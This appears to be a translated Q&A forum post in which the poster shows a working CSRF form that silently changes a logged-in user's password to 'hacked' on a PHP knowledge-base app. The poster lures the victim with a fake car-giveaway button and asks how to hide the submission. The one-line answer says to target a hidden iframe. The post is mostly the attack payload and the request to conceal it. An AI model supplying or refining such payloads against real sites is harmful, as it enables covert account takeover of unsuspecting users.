我正在工作的这个项目似乎容易受到CSRF的影响。我构建了以下攻击,我诱骗用户单击包含以下内容的链接:
<form onsubmit="top." action="http://localhost/aphpkb/change_password.php" method="post">
<input type="hidden" value="hacked" name="password1" size="20" maxlength="20" />
<input type="hidden" value="hacked" name="password2" size="20" maxlength="20" />
<input type="submit" name="submit" value="Click here for a new Camry!!" />
</form>
当用户当前登录到站点时,此攻击会起作用并更改站点的密码。但是,页面的结果会呈现给最终用户。我尝试了各种方法来“静静地”POST表单(基于PHP的方法和基于JS的方法),但没有用。
任何人都可以提供一些指导,也许可以指出我是否可以默默地发布到另一个网站?我非常感谢你们,非常感谢!
答案 0 :(得分:3)
将表单的target设置为隐藏的<iframe>。